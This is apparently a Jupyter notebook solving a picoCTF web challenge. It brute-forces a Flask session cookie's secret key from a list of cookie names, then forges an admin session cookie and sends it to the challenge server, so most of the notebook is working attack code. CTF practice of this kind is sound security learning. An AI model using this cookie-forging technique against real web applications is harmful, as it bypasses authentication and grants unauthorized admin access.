In [1]:
import requests
from IPython.display import HTML
import zlib
from flask.sessions import SecureCookieSessionInterface
from itsdangerous import base64_decode, URLSafeTimedSerializer

In [2]:
#https://qiita.com/koki-sato/items/6ff94197cf96d50b5d8f

In [3]:
url = "http://mercury.picoctf.net:52134"

In [4]:
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

In [5]:
class SimpleSecureCookieSessionInterface(SecureCookieSessionInterface):
    # NOTE: Override method
    def get_signing_serializer(self, secret_key):
        signer_kwargs = {
            'key_derivation': self.key_derivation,
            'digest_method': self.digest_method
        }
        return URLSafeTimedSerializer(
            secret_key,
            salt=self.salt,
            serializer=self.serializer,
            signer_kwargs=signer_kwargs
        )


class FlaskSessionCookieManager:
    @classmethod
    def decode(cls, secret_key, cookie):
        sscsi = SimpleSecureCookieSessionInterface()
        signingSerializer = sscsi.get_signing_serializer(secret_key)
        return signingSerializer.loads(cookie)

    @classmethod
    def encode(cls, secret_key, session):
        sscsi = SimpleSecureCookieSessionInterface()
        signingSerializer = sscsi.get_signing_serializer(secret_key)
        return signingSerializer.dumps(session)

In [6]:
with requests.Session() as s:
    page = s.get(url)
    cookie = s.cookies

In [7]:
cookie.values()

['eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.YFcInA.AI3WPo_oTQIDwaNIH8tG6wm6_hw']

In [8]:
for cookie_name in cookie_names:
    try:
        print(FlaskSessionCookieManager.decode(cookie_name, cookie.values()[0]))
        break
    except:
        pass

{'very_auth': 'blank'}


In [9]:
session = {'very_auth': 'admin'}
new_cookie = FlaskSessionCookieManager.encode(cookie_name, session)

In [10]:
with requests.Session() as s:
    s.cookies.update({"session":new_cookie})
    page = s.get(url)
HTML(page.text)